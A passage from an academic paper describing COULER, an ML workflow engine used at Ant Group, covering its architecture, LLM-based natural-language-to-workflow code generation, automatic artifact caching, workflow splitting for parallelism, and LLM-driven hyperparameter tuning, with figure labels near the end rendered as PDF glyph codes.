LLMs in unified programming\ncode generation. By leveraging LLMs, we facilitated the\ngeneration of unified programming code using NL descrip-\ntions. Additionally, we automate hyperparameters tuning\nthrough the integration of Dataset Card and Model Card,\nenhancing the effectiveness of the autoML process.\n\u2022Efficiency : We introduce the Intermediate Representative\n(IR) to depict the workflow Directed Acyclic Graph (DAG),\noptimizing extensive workflow computations by dividing a\nlarge workflow into smaller ones for auto-parallelism opti-\nmization. We also implement dynamic caching of artifacts,\nwhich are the outputs of jobs in the workflow, to minimize\nredundant computations and ensure fault tolerance.\n\u2022Open Source Community : We constructed the platform to\nassist data scientists in defining and managing workflows,\nenabling system deployment in real production environ-\nments on a large scale. The released open-source version has\ngarnered adoption from multiple companies and end-users *.\nFor instance, over 3000 end users are utilizing C OULER\nwithin A NTGROUP , and more than 20 companies have\nadopted C OULER as their default workflow engine interface.\nII. S YSTEM FRAMEWORK\nFigure 2 illustrates the C OULER architecture, highlighting\nvarious components and multiple aggregation layers that facili-\ntate scaling across clusters. Initially, we provide two interfaces\nfor defining workflows: one through Natural Language and the\nother through GUI, SQL, and programming languages such as\nPython and GoLang. Once a workflow is defined, it\u2019s converted\ninto an Intermediate Representation (IR) format. Subsequently,\noptimization measures, specifically the auto hyperparameter\ntuning optimizer and workflow auto-parallelism, are employed\nto refine the workflow. Upon completion, C OULER generates\nthe final workflow which is then submitted to the designated\nworkflow engine. Concurrently, an automated caching mecha-\nnism operates in real-time, dynamically updating the cache as\nthe workflow progresses.\nA. Workflow Description\nWe offer two primary methods for users to construct work-\nflows. The first leverages Natural Language (NL) descrip-\ntions, wherein we employ LLMs, such as ChatGPT-3.5 and\nChatGPT-4, to generate code compliant with a standardized\nworkflow interface definition (\u00a7III). Simultaneously, users can\nalternatively create workflows using a Graphical User Interface\n(GUI)(\u00a7V), SQL tools like SQLFlow(\u00a7V), or directly through\nprogramming languages such as Golang or Python.\nB. Workflow DAG Generator\nWe propose a unified programming interface to define\nworkflows in a DAG way. This interface is designed to allow\nusers to delineate workflows without specific knowledge of\nthe underlying workflow engine. And it offers fundamental\n*https://couler-proj.github.io/couler/Natural Language\nSQL GUI DSLTraditional typesType 2Type 1\ncloud -based \nworkflow \nengine\nlocal -based \nworkflow\nengine...DAGOptimizer\nWorkflow \nSplitingIR generator Workflow\ngenerator\nAuto \nCachingAuto\n Hyperparameter \nTunningStatic Optimizer Dynamic Optimizer1 2 3 4 5 Input flows \nModel ParamLLM\nPod 1\nPod 2batch s, ...\nlr, ...64, ...\n0.1, ...J1 J2 J3J4\nJ5 J6Caching StorageExchange?Workflow EngineFig. 2: Overview of C OULER Architecture.\nfunctions such as executing scripts, containers, or jobs, stip-\nulating conditions, and managing multiple instances of a job,\namong others. For example, the code 1 shows how to build a\nworkflow implicitly. By this way, users need to own a clear\nbig picture for the workflow, and under how the running logic\namong steps in their real application. The definition of DAG\nworkflow via explicit way helps data engineer to debug a failed\nworkflow more easily, and build a complicated workflow with\nhundred nodes. More detailed information about the interface\nis given in Appendix A.\n1def job(name):\n2 couler.run_container(\n3 image=\"whalesay:latest\",\n4 command=[\"cowsay\"],\n5 args=[name], step_name=name)\n6\n7def diamond():\n8 couler.dag(\n9 [[lambda: job(name=\"A\")],\n10 [lambda: job(name=\"A\"), # A -> B\n11 lambda: job(name=\"B\")],\n12 [lambda: job(name=\"A\"), # A -> C\n13 lambda: job(name=\"C\")],\n14 [lambda: job(name=\"B\"), # B -> D\n15 lambda: job(name=\"D\")],\n16 [lambda: job(name=\"C\"), # C -> D])\n17 lambda: job(name=\"D\")]\n18 ])\n19diamond() / *Execute the diamond function. */\n20submitter = ArgoSubmitter()\n21/*Submit and run the workflow over Argo. */\n22couler.run(submitter=submitter)\nCode 1: An Example Workflow DAG in C OULER\nC. Workflow Intermediate Representation\nA workflow processes a stream of input data to train a\nmodel, subsequently generating a new model for machine\nlearning applications. Typically, a workflow is represented in\na DAG format. Consequently, we represent a workflow in\nan intermediate representation (IR) format, unbound to any\nspecific backend workflow engine or platform. Utilizing IR\nallows us to optimize the workflow independently of platform-related properties, enabling C OULER to assimilate workflows\nfrom the unified programming interface.\nD. Auto Tuning Optimizer and Workflow Optimizer\nWe utilize LLMs to generate recommended hyperparameter\nconfigurations for machine learning models, by analyzing\ndataset characteristics from Dataset Card and model informa-\ntion from Model Card (\u00a7IV .C). This approach automates the\nfine-tuning of hyperparameters in machine learning workflows,\nenabling LLMs to generate configurations that enhance model\nperformance. Based on the workflow\u2019s IR, the C OULER server\nemploys a rule-based approach to formulate the optimiza-\ntion plan before initiating a workflow. The considerations\nfor this plan include optimizing large workflows, resource\nrequest optimization, and the reuse of intermediate results. All\noptimizations adhere to a predefined interface, incorporating\ntheir specific implementations. Further details regarding these\noptimizations are provided in Section (\u00a7IV .B).\nE. Automatic Caching Optimizer\nIn C OULER , artifacts are integrated as valuable products\nof workflow development, including datasets, parameters, di-\nagrams, etc. Various physical storage options are available\nand can be registered to accommodate different types of\nartifacts. We offer an Automatic Caching Mechanism based\non the artifact to dynamically update the cache during work-\nflow execution (\u00a7IV .A). For each currently executing pod, a\ncomprehensive analysis is conducted across three dimensions:\npast usage, future usage, and the cost-effectiveness of caching.\nThis analysis yields a cache value score, used to re-evaluate\nthe existing cache content. This re-evaluation helps determine\nwhether updates need to be made to the cache.\nF . Workflow Generator and Workflow Engines\nCOULER aims to enable workflows to operate across various\nplatforms, with a particular focus on cloud-native processing.\nTo accelerate execution, we aim to support workflow genera-\ntion tailored to specific platforms. As a result, the final phase\nof C OULER optimization involves generating workflows to\nexecute on distinct workflow engines. The workflow generator\nconverts the intermediate representation of a DAG to anexecutable format. Then, a workflow engine like Argo can\nexecute this format (e.g., YAML format for Argo workflow).\nThis YAML is then sent to the Argo operator within a\nKubernetes cluster, demonstrating how the abstraction of IR\nallows for flexibility in supporting various workflow engines.\nIn Kubernetes, the workflow engine operates as a workflow\noperator. Initially, this operator allocates the associated Kuber-\nnetes resources (i.e., Pods) according to the resource definition\nfor a step in a workflow, and then monitors the status of\nsteps, updating the workflow status as needed. The execution\ntopology of the workflow is dictated by the workflow\u2019s DAG,\nwith the workflow operator scheduling the relevant steps in\nthe cluster based on the status of steps and the DAG.\nIII. NL TOUNIFIED PROGRAMMING INTERFACE\nIn this section, we explore the application of LLMs for\nconverting Natural Language (NL) to Unified Programming\nInterface as shown in Section(\u00a7III.B). Traditional methods\ninvolve defining workflows using various techniques and sub-\nmitting them to a cluster. Lately, LLMs have demonstrated\nremarkable performance across a wide array of inference\ntasks. However, upon direct application of LLMs for unified\nprogramming code generation, certain challenges arise: Firstly,\nthe overall workflow complexity hampers the performance\nof LLMs in complete workflow conversion. Secondly, LLMs\npossess limited knowledge regarding C OULER \u2019s unified pro-\ngramming interface.\nTo address these challenges, we introduce a method that\nleverages LLMs to automatically translate natural language\ninto unified programming code via the crafting of task-specific\nprompts. This approach enables users to articulate their desired\nworkflows in natural language, which are then automatically\ntranslated into executable unified programming code. As a\nresult, our method simplifies the C OULER workflow creation\nprocess and improves usability for individuals with limited\nprogramming experience, as illustrated in Figure 3. We also\nintroduce this procedure through a running example in Sec-\ntion (\u00a7V .D). The transition from NL descriptions to C OULER\ncode encompasses four pivotal steps:\nStep 1: Modular Decomposition : Initially, we employ a\nchain of thought strategy [50] to decompose natural language\ndescriptions into smaller, more concise task modules, such\nas data loading, data processing, model generation, and eval-\nuation metrics. Each module should encapsulate a singular,\ncoherent task to ensure the precision and correctness of the\ngenerated C OULER code. A series of predefined task types\ncan be established to identify and extract pertinent tasks based\non the input of natural language descriptions automatically.\nThey provide a structured approach to ensure the precision\nand correctness of the code generated.\nStep 2: Code Generation : For each independent subtask, we\nutilize LLMs to generate code. Considering that LLMs have\nlimited knowledge about C OULER , we construct a Code Lake\ncontaining code for various functions. We search for relevant\ncode from the Code Lake for each subtask and provide it to\nWorkflow Description\nUnified Programming CodePrompt I have a NL description ... Step 1: Modular Decomposition\nChain-of-Thought\nSubtask in Chains\n1 2 n ...\n1Step 2: Code Generation\n2 n ...\nCode Lake\nStep 3: Self-calibration\nStep 4: User Feedback\nCode_1 Code_2 Code_n\nWhen users execute the generated workflow code, they can submit feedback or\nsuggest modifications to the LLM.I have generated some code for a\nspecific task. Can you evaluate it\nand provide a score...Code_1\n Code_1 2Code_2 nCode_n Code_n ...\nCode_1 Code_2 Code_n ...1 Prompt + Prompt + Prompt + \n Critique RepeatFig. 3: NL to Unified Programming Interface\nLLMs for reference. This significantly improves the ability for\nunified programming code generation.\nAlgorithm 1 NL to Unified Programming Interface\nInput: Description D, LLM L, Baseline Score Sb\nOutput: Executable C OULER CodeC\n1:Modular Decomposition: chain of thought to decom-\npose NL description Dinto smaller chains di\n2:foreach subtask diin chains do\n3: Generate Subtask Code:\n4: Search for relevant code as reference\n5: UseLto generate code cifor the subtask di\n6: Self-calibration:\n7: Compute score siforcileveraging L\n8: while si< Sbdo\n9: Re-generate subtask code and update si\n10: end while\n11:end for\n12:User Feedback: review and validate the generated unified\nprogramming code\nStep 3: Self-calibration : After generating the code for each\nsubtask, we integrate a self-calibration strategy [47] to opti-\nmize the generated code. This strategy evaluates the generated\ncode by having LLMs critique it, as shown in Algorithm 1. In\nline 8, there may be complex scenarios in which achieving\nthe desired score is impractical for various reasons. Users\ncan adjust Baseline Score in instances where it is set too\nambitiously, rendering it unattainable. Initially, we define abaseline score Sbas the standard evaluation score. We use\nLLMs to evaluate the generated code cifor a score sibetween\n0 and 1, and if si< Sb, we will provide feedback of LLMs\nand repeat the code generation. After this self-calibration, we\nwill have improved code for each subtask.\nStep 4: User Feedback : Finally, users can review and validate\nthe generated workflow code. If the generated code fails\nto meet the users\u2019 requirements, they have the opportunity\nto provide feedback and suggestions in textual format. The\nsystem will leverage this feedback to optimize the code and\nenhance the precision of code generation.\nIV. W ORKFLOW OPTIMIZATION\nIn this section, we present three optimizations implemented\nat A NTGROUP to enhance workflow efficiency. Firstly, we\nintroduce an artifact auto-caching mechanism to eliminate\nredundant computations. Secondly, for workflows comprising\nthousands of nodes, we propose a heuristic approach to\npartition large workflows into smaller units, thereby maximiz-\ning workflow parallelism. Lastly, we introduce an automatic\nhyperparameters tuning method based on LLMs to automate\nthe training pipeline of ML workflows.\nA. Automatic Artifact Caching Mechanisms\nTABLE I: Set of common notations used in our description.\nNotation Definition\nG DAG of workflow (G=\u27e8J, E, C \u27e9)\nJobs J, Edges E, Configurations C\nA Adjacency matrix of a directed graph G\nJs, Jp Serial and Parallel Job Sets\nu Artifact u\nL The reconstruction cost of artifacts\nF The utility value of artifacts\nV The cache cost of artifacts\nI The cache assessment metrics of artifacts\nNc List of cached artifacts: {u1, ..., u i}\nt, s Computation Time and space usage of Jobs\nMotivation of Caching. Machine learning model develop-\nment is a highly iterative process, often involving repeated\nsteps with variations. This iterative nature can lead to sig-\nnificant duplicated work, especially concerning data import\nand transformation. By caching intermediate results, such as\npreprocessed data or feature representations, data scientists\ncan avoid redundant computations across iterations, thus ac-\ncelerating the development process. This increased iteration\nspeed translates into higher productivity, allowing problems\nto be solved faster and empowering data scientists. However,\ncaching introduces additional overhead e.g., storage costs. In\nthis work, we introduce the way to strike the right balance\nbetween storage overhead and computational cost savings in\nANTGROUP .\n1) Problem Statement and Evaluation Metrics: Caching all\nintermediate data (called artifacts in this work) is an instinctive\napproach, but it comes with challenges. Firstly, not all data\nmerits caching, especially if it is not slated for reuse in the\nforeseeable future. Secondly, the associated costs of caching\ncan be prohibitive. For instance, at A NTGROUP , we delegateintermediate artifact storage to distributed in-memory systems\nlike Apache Alluxio [25]. Given the finite memory capacities\nof such systems, making judicious decisions about which\nartifacts to cache is crucial. This necessitates an automatic\nselection mechanism that factors in the caching expense cost\nwhen determining which data to store.\nThus, we prioritize workflow execution time and memory\nconsumption as the pivotal performance metrics and targets for\noptimization. Specifically, we define the workflow execution\ntime, represented as T, as the duration required for completing\nthe Critical Path. This Critical Path is characterized as the\nelongated sequence of interdependent tasks spanning from the\ninception to the culmination of the workflow as in [56]. On\nthe other hand, the metric for memory expenditure, symbolized\nasS, is construed as the peak memory consumption observed\nacross all concurrently operating nodes. Based on these defi-\nnitions, the cost function can be articulated as follows:\nT= max(X\np\u2208Jttp) (1)\nS= max(X\np\u2208Jssp) (2)\nwhere tpandspis the time and memory usage for Job p.\nWe define the job groups with the longest running time and\nthe largest resource consumption as JtandJs, respectively.\n2) Principles of Automatic Caching: In this study, we\npropose a metric called the caching importance factor to\nascertain the significance of caching a specific artifact (namely\nu). This factor serves as a guiding principle to dynamically\ndetermine which artifact warrants caching. We represent this\nby a function, I(u), which computes the caching importance\nfactor for artifact u. Our formulation of this metric is primarily\ninfluenced by three determinants: the cost of reconstructing\nthe artifact, denoted as L; the expected value of reusing\nthe artifact, represented as F; and the associated expense of\ncaching, labeled V. Details are presented below.\nArtifact reconstruction cost: refers to the expense incurred\nwhen re-creating or regenerating machine learning artifacts or\nintermediate results that were not cached or saved during the\nworkflow. When these artifacts are not cached or saved, and\nthey need to be reconstructed from raw data or recomputed,\nit can result in additional computational expenses, increased\nexecution time, and potentially higher resource usage. Mini-\nmizing artifact reconstruction costs is one of the objectives of\neffective caching strategies in ML workflows.\nIn this research, given an artifact u, we focus on analyzing\nthe subgraph containing nodes that serve as predecessors to\nartifact u, which we refer to as Gp={J1, ..., J s}. Note that,\nto simplify our discussion in this work, we only consider\nsubgraphs with the following properties: (a) We select the\nsubgraph Gp, formed by the preceding nlayers of jobs from\nnode u, as it is the most representative. (b)If the artifact\nof a job within Gpis cached, Gpwill be truncated at that\npoint. On this basis, we hope to minimize the related artifact\nreconstruction cost L(u). Within this subgraph Gp, the costL(u)is determined by the computational resources utilized\nby jobs and the storage resources associated with the artifacts\ninvolved. Formally, L(u)is defined as follow way:\nL(u) =sX\ni=1sX\nj=1Aij\u00b7(wi+di\u00b7dj) (3)\nwhere, Adenote the adjacency matrix, respectively. wirep-\nresents the resource consumption of job i. The degree di\nindicates the level of significance for job i, and srepresents\nthe number of nodes in Gp. By this way, we formulate the\noverall runtime complexity of Gp, taking into account the\nvarying importance of each node.\nArtifact reuse value: refers to the benefits and advantages\ngained by reusing previously generated artifacts (e.g., prepro-\ncessed data, feature representations, or model checkpoints) in\na machine learning workflow. The value comes from avoiding\nredundant computations and leveraging the work done in\nearlier stages of the workflow, ultimately leading to resource\nsavings and more efficient model development. Maximizing\nthe reuse value is another optimization target in this work.\nGiven an artifact u, the artifact reuse value name as F(u)is\ninfluenced via the successor of workflow graph. This graph is\nreferred as Gswhose definition is the same as Gp. Within this\nsubgraph Gs={J1, ..., J t}, we hope to maximize the artifact\nreuse value F(u)as following way.\nF(u) =tX\ni=1r\n\u03baui\u00b7(\u03b6ui+ 1) (4)\nWhere \u03bauirepresents distance for node uand node iin the\nsubgraph Gs,rrepresents a boolean state indicating whether\na reuse event occurs for artifact uandtrepresents the number\nof nodes in Gs. Then, \u03b6uiis the weighted value for the\ndependency of job ionu. Given the adjacency matrix as A\nand the degree of nodes as d. We use diag to represent the\ndiagonal matrix, and matrix \u03b6can be computed as follow:\n\u03b6=diag[d1, ..., d n]\u2212A (5)\nArtifact caching cost: refers to the expenses associated\nwith storing and managing cached artifacts or intermediate\nresults in a machine learning workflow. In this work, we use\nthe distributed in-memory storage to store the artifact, thus, we\nmainly consider u\u2019s memory consumption (name as V(u)).\nOverall, given a artifact u, we formalize the caching impor-\ntance factor ofuas follow:\nI(u) =\u03b1\u00b7log(1 + L(u)) +\u03b2\u00b7 F(u)2\u2212e\u2212V(u)(6)\nwhere \u03b1and\u03b2are weight parameters for the metrics, and\ntheir optimal values are selected through experimental studies\nin the production environment. The \u03b1and\u03b2are used to\nadjust the weights among the three factors: reconstruction cost,\nreuse value, and cache cost. As the impact of these factors on\nefficiency varies in different training scenarios, it is necessary\nto adjust them according to the actual situation.\nThe caching importance factor plays a crucial role in\ndeciding whether a new artifact should replace an existingAlgorithm 2 Automatic Caching Mechanisms\n1:Input: JobSet N, Workflow G, Artifact Cached List Nc,\nUsed Caching Storage Cu, Total Caching Storage Ct\n2:Output: Dynamic Caching Set Dc\n3:function L(u)\u2192Returns artifact reconstruction cost of u\n4:function F(u)\u2192Returns artifact reuse value of u\n5:function V(u)\u2192Returns artifact caching cost of u\n6:function I(l,f,v)\u2192Returns caching importance factor\nofu\n7:Cu\u2190 \u2205,Nc\u2190 \u2205\n8:markUnVisited( G)\n9:for all u\u2208 N do\n10: ifnot Visited( u) and Cu< Ctthen\n11: u\u2192Nc\n12: else if not Visited( u) and Cu\u2265Ctthen\n13: NodeSelection( u,G,Nc,Cu,Ct)\n14: end if\n15:end for\n16:function NODESELECTION (u,G,Nc,Cu,Ct)\n17: for all u\u2208Ncdo\n18: vi\u2190 V (u) \u25b7V(u):memory consumption\n19: li\u2190 L (u) \u25b7using Eq. (3)\n20: fi\u2190 F (u) \u25b7using Eq. (4)\n21: Ii\u2190 I (li,fi,vi) \u25b7using Eq. (6)\n22: end for\n23: MarkVisited( u)\n24: while Cu> Ctdo\n25: umin\u2190arg min ui\u2208NcIi\n26: ifumin\u0338=uthen\n27: uinNc,umin outNc\n28: else\n29: uioutNc\n30: end if\n31: update Cu\n32: end while\n33:end function\none in the cache memory. This factor is instrumental in\nenabling C OULER to maximize execution time efficiency while\nworking within the constraints of limited cache space. We\nwill recompute the caching importance factor of all remaining\nitems in the Caching Storage whenever an item is removed.\nIn this way, we hope to reduce the communication overhead\nin the workflow and the reconstruction cost when artifacts are\nreused, thereby decreasing the overall runtime T. We introduce\nthe Algorithm 2 to determine which artifacts should be cached\nduring the caching process based on the constraint.\nTo make optimal cache exchange decisions, C OULER \u2019s\ndynamic caching module calculates the caching value of newly\ngenerated artifacts during the workflow execution process.\nAlgorithm 2 provides an overview of how the dynamic caching\nstrategy module makes cache decisions and optimizes execu-\ntion time efficiency. The monitor attempts to place newly gen-\nerated artifact into the cache (line 11). If there is insufficient\ncache space, we calculate a cache score based on the attributesof the new artifact (line 16-21). This score is then compared\nto the scores of artifacts already in the cache (line 24-30),\ndetermining whether to remove an existing cached artifact.\nThis process is repeated until there is enough cache storage\navailable or the score of the new artifact is lower than the\ncompared score.\nJ1 J2 J3 J5\nJ6 J7J9\nJ8J4\nArtifact\na1Attributes\nattr1, ...Score\n77.2\na3 attr1, ... 81.4\nCaching StorageCache Score TableWorkflow\nJ1 J2 J3 J5\nJ6 J7J9\nJ8J4\nCaching StorageCache Score TableWorkflowCache Updatea1 a3 a5\na5 attr1, ... 74.7\na1 a3 a6Artifact\na1Attributes\nattr1, ...Score\n77.2\na3 attr1, ... 81.4\na6 attr1, ... 79.6a1 a2a4\na3\na3a5\na6a7a8\na1 a2a4\na3\na3a5\na6a7a8\na5J:Job\na:Artifact\nFig. 4: Running Example of Automatic Caching\n3) Running Example of Automatic Caching: Figure 4\npresents a running example for the caching strategy in this\nwork. In the workflow, the green sections represent the Jobs\nthat have completed execution, the yellow sections indicate\nthe Jobs currently in execution, and the blue sections denote\nthe Jobs awaiting execution. Arrows represent the dependency\nrelationships between Jobs. The Cache Score Table maintains\nrecords of the size, type, and other attributes of cached\nartifacts, as well as their cache scores. Note that caching\nstorage refers to the cache space allocated for the workflow.\nUpon the completion of J6, COULER calculates the cache\nscore for artifact a6based on the attribution of a6. Subse-\nquently, C OULER attempts to store artifact a6in the Caching\nStorage. If the remaining space is to be insufficient for a6,\nCOULER compares a6\u2019s cache score with that of a5, which has\nthe lowest score in the Cache Score Table. Due to a6\u2019s score\nis higher than a5,a5is replaced by a6. If the Caching Storage\nis still inadequate, the comparison continues with the artifact\nhaving the next lowest score, and this process is repeated until\nan artifact with a higher score than a6or adequate storage\ncapacity becomes available to cache a6.\nB. Big Workflow Auto Parallelism Optimization\nIn general, a workflow can be very big (i.e., more than one\nthousand nodes). At A NTGROUP , we run into the case where\nthe workflow involves more than four hundred nodes. This\nwould bring two issues. At first, each workflow is a KubernetesCRD (Custom Resource Definition), the CRD is defined in\nYAML format and the size of CRD is limited to specific\nrequirements. For example, the API server of Kubernetes\nwould be overflowed by the large CRD (e.g., the size of YAML\ncan not bigger than 2MB in practice). Secondly, the user\ncannot define the workflows properly to achieve maximum\nparallelism in a big DAG, therefore, the optimizer of C OULER\nneeds to analyze the dependence of workflow and split the\nworkflow into multiple ones.\nAlgorithm 3 Big Workflow Auto Parallelism Mechanisms\nInput: Budget C, Workflow G\nOutput: Multiple split workflows Ws\n1:Cand\u2190 \u2205,Ws\u2190 \u2205\n2:markUnVisited( G)\n3:for all ni\u2208 N do\n4: ifnot Visited( vi)then\n5: NodeSelection( ni,G,Nc,Cu,Ct)\n6: end if\n7:end for\n8:function SPLIT WORKFLOW (v1,C,G, Ws, Cand )\n9: bi\u2190BudgetOnUnV isitedV ertex (G)\n10: if(b1\u2264 C)then\n11: Ws\u2190Ws+G\n12: return Ws\n13: end if\n14: MarkVisited( vi)\n15: C\u2190Cand + v1,b2\u2190BudgetOnGraph( C)\n16: ifb2\u2265 C then\n17: Ws\u2190Ws+Cand, Cand \u2190v1\n18: else\n19: Cand\u2190C\n20: end if\n21: for all v\u2208adj(v1)do\n22: ifnot Visited( v)then\n23: SplitWorkflow( v,C,G, Ws, Cand)\n24: end if\n25: end for\n26:end function\nIn this paper, we first define the budget of workflow. The\nbudget is used to decide whether we need to split a big\nworkflow into small ones. The budget (namely C) could be\nthe (a) size of workflow CRD in YAML format: ( \u03b1), (b) the\nnumber of steps in a workflow: \u03b2, (c) the number of pods: ( \u03b3)\nin a workflow. Thus, C=\u03b1+\u03b2+\u03b3. In this work, we mainly\nuse the size of workflow \u03b1as the default budget value. For\nexample, \u03b1exceeds 2 MB or \u03b2exceeds 200. Naturally, if a\nworkflow is bigger than a predefined budget, it needs to be\nsplit into small ones.\nGiven the required budget and a big workflow in DAG\nformat, the optimization goal is a problem of finding optimal\nDAG sets to schedule workflow so we can win the maximum\nparallel. It is tempting to reach for classical results [20] in the\noptimal graph topological order to identify an optimal sched-\nule. The topological ordering of a directed graph could be usedto split a big graph into smaller graphs for scheduling. In this\nwork, we identify a workflow sets by depth-first search (DFS)\nover a DAG. Algorithm 3 goes through each vertex of the\ngraph and puts this vertex into a workflow candidates greedily\nuntil each vertex is visited or the workflow meeting the budget\nrequirement. Initially, we mark every vertex as unvisited in\nline 1 and recursively split the related DAG from the unvisited\nvertex one by one from lines 2 to 4. Function SplitWorkflow\nis used to split the input DAG. At first, we check whether the\ncurrent workflow meets the requirement, that is, the budget\nis smaller than the requirement from lines 7 to 9. Next, we\nmark the current vertex v1as visited and check whether it is\npossible to add the vertex v1into the DAG candidate C. if\nthe vertex v1fails to join the current subgraph C, we put the\ncurrent subgraph Cinto the output set of DAGs (namely Ws).\nFinally, we go through the adjacent list of v1and continue to\nsplit the input DAG. Function BudgetOnUnV isitedV ertex\nin line 7 and BudgetOnGraph in line 10 compute the related\nbudget for the input graph for the un-visited vertex of input\nDAG or the whole DAG, respectively. Because we go through\nthe input DAG via the depth first search order, the runtime\ncost of the proposed approach is the number of vertex (i.e.,\nO(|V|)).\nC. Automatic Hyperparameters Tuning\nWe explore the use of LLMs for automatic hyperparame-\nters tuning of machine learning models by analyzing dataset\ncharacteristics from Dataset Card [16] and model information\nfrom Model Card [26]. This approach automates the fine-\ntuning of hyperparameters in machine learning workflows,\nenabling LLMs to generate configurations that enhance model\nperformance. We detail the implementation approach and\ndemonstrate how this automated configuration process im-\nproves the efficiency and effectiveness of model training in\nAlgorithm 4.\nAlgorithm 4 Automatic Hyperparameters Tuning\nInput: Data Card D, Model Card M, Hyperparameters Set\nH, LLM L\nOutput: Targeted Hyperparameters ht\n1:Data Card: comprise of the dataset name, input dataset\ntype, label space, and default evaluation metrics\n2:Model Card: consist of the model name, model structure,\nmodel descriptions, and architecture hyperparameters\n3:foreach hyperparameters hiinHdo\n4: Predicted Training Log:\n5: /* Generate a training log tifor a given hyperparam-\neter setting hiby leveraging LLM L. */\n6:end for\n7:Targeted Hyperparameters:\n8:ht\u2190best performance for hiinHbased on ti\nTo fully exploit the capabilities of LLMs and generate\neffective prompts, we tailor prompts to the Data Card, Model\nCard, and hyperparameters information. The Data Card D\ncomprehensively describes the dataset, including details suchas data name, data type, label space, and evaluation metrics.\nThe Model Card Mprovides a thorough description of the\nmodel, encompassing the model name, structure, description,\nand architecture hyperparameters, while the hyperparameters\ncover various parameter value ranges.\nInitially, we have a hyperparameters set Hcontaining a few\noptional hyperparameters. Without requiring training on actual\nhardware, we employ LLMs to automatically predict perfor-\nmance during the training process, subsequently returning a\ntraining log for each hyperparameters hiinH[58]. This log\ncaptures various parameters and information from the training\nprocess. By examining the training log, we can observe the\neffects of different hyperparameters during training. After sev-\neral rounds of testing, we select the training hyperparameters\nthat yield the best performance. We introduce this procedure\nthrough a running example in Appendix C.\nV. I MPLEMENTATION\nThe Python SDK for C OULER is now open-source. Several\ntop enterprises have integrated this SDK into their produc-\ntion environments. The whole C OULER service is crafted in\nGolang, encompassing all internal components. Regarding the\nexpressiveness of C OULER \u2019s API compared to the com-\nplete APIs of the supported workflow engines, C OULER has\nachieved over 90% coverage of the Argo API. Additionally, it\nsupports approximately 40-50% of the Airflow API. We are\nactively working to enhance our support for Airflow and other\nworkflow engines. Due to space constraints, we put extensive\ndiscussions on implementation of C OULER into the Appendix\nB.\nVI. E VALUATION\nOur evaluation results, which encompass diverse industrial\nmodels and data spanning several months, aim to address the\nfollowing research questions:\n\u2022RQ1: What is the usage frequency of C OULER in A NT\nGROUP ?\n\u2022RQ2: How effective is the automatic caching performance\nof C OULER ?\n\u2022RQ3: How about the performance of NL to Unified Pro-\ngramming Code Generation?\n\u2022RQ4: How proficient is C OULER \u2019s capability of automatic\nhyperparameter configuration?\nA. Experiment Setup\nProduction Environment. In A NTGROUP , various types\nof workflows operate concurrently in a shared cluster. The\ncluster provides substantial resources, with about 1,600,000\nCPU cores, 4,500 GPU cores, 3.24 PB of memory, and\n344 PB of disk space. This setup supports A NTGROUP \u2019s\ndiverse computational needs, enabling different workflows to\nrun efficiently within the same shared resource environment.\nCOULER is utilized to support over 95% of workflows in the\nproduction environment (e.g., 22k/day). The extensive scale of\nworkflow operations provides accurate statistical estimates of\nthe actual gain./uni00000013 /uni00000014/uni00000013 /uni00000015/uni00000013 /uni00000016/uni00000013\n/uni0000003a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000003/uni00000048/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000056/uni00000003/uni00000053/uni00000048/uni00000055/uni00000003/uni00000047/uni00000044/uni0000005c/uni0000000b/uni0000004e/uni0000000c/uni00000013/uni00000014/uni00000013/uni00000015/uni00000013/uni00000016/uni00000013/uni00000017/uni00000013/uni00000029/uni00000055/uni00000048/uni00000054/uni00000058/uni00000048/uni00000051/uni00000046/uni0000005c/uni00000030/uni00000048/uni00000044/uni00000051/uni00000003/uni0000000b/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000015/uni00000015\n/uni00000030/uni00000048/uni00000047/uni0000004c/uni00000044/uni00000051/uni00000003/uni0000000bm/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000014/uni0000001b(a) Distributin of workflow quantity\n/uni00000013 /uni00000014/uni00000013 /uni00000015/uni00000013 /uni00000016/uni00000013\n/uni00000028/uni0000005b/uni00000048/uni00000046/uni00000058/uni00000057/uni0000004c/uni00000052/uni00000051/uni00000003/uni00000057/uni0000004c/uni00000050/uni00000048/uni00000003/uni00000052/uni00000049/uni00000003/uni00000044/uni00000003/uni0000005a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni0000000b/uni0000004b/uni00000052/uni00000058/uni00000055/uni00000056/uni0000000c/uni00000013/uni00000015/uni00000013/uni00000017/uni00000013/uni00000019/uni00000013/uni0000001b/uni00000013/uni00000014/uni00000013/uni00000013/uni00000029/uni00000055/uni00000048/uni00000054/uni00000058/uni00000048/uni00000051/uni00000046/uni0000005c/uni00000030/uni00000048/uni00000044/uni00000051/uni00000003/uni0000000b/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000014\n/uni00000030/uni00000048/uni00000047/uni0000004c/uni00000044/uni00000051/uni00000003/uni0000000bm/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000015/uni00000011/uni0000001a (b) Distributin of workflow lifespan\n/uni00000013 /uni00000015/uni00000013 /uni00000017/uni00000013 /uni00000019/uni00000013 /uni0000001b/uni00000013 /uni00000014/uni00000013/uni00000013\n/uni00000026/uni00000033/uni00000038/uni00000003/uni00000046/uni00000052/uni00000055/uni00000048/uni00000003/uni00000058/uni00000056/uni00000044/uni0000004a/uni00000048/uni00000003/uni00000053/uni00000048/uni00000055/uni00000003/uni0000005a/uni00000052/uni00000055/uni0000004e/uni00000049/uni0000004f/uni00000052/uni0000005a/uni00000013/uni00000018/uni00000014/uni00000013/uni00000014/uni00000018/uni00000015/uni00000013/uni00000015/uni00000018/uni00000029/uni00000055/uni00000048/uni00000054/uni00000058/uni00000048/uni00000051/uni00000046/uni0000005c/uni00000030/uni00000048/uni00000044/uni00000051/uni00000003/uni0000000b/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000016/uni00000019\n/uni00000030/uni00000048/uni00000047/uni0000004c/uni00000044/uni00000051/uni00000003/uni0000000bm/uni0000000c/uni00000003/uni00000020/uni00000003/uni00000016/uni00000016 (c) Distributin of CPU core usage\nFig. 5: From July 2022 to July 2023, workflow activity analysis of C OULER in A NTGROUP\n/uni00000015 /uni00000017 /uni00000019 /uni0000001b 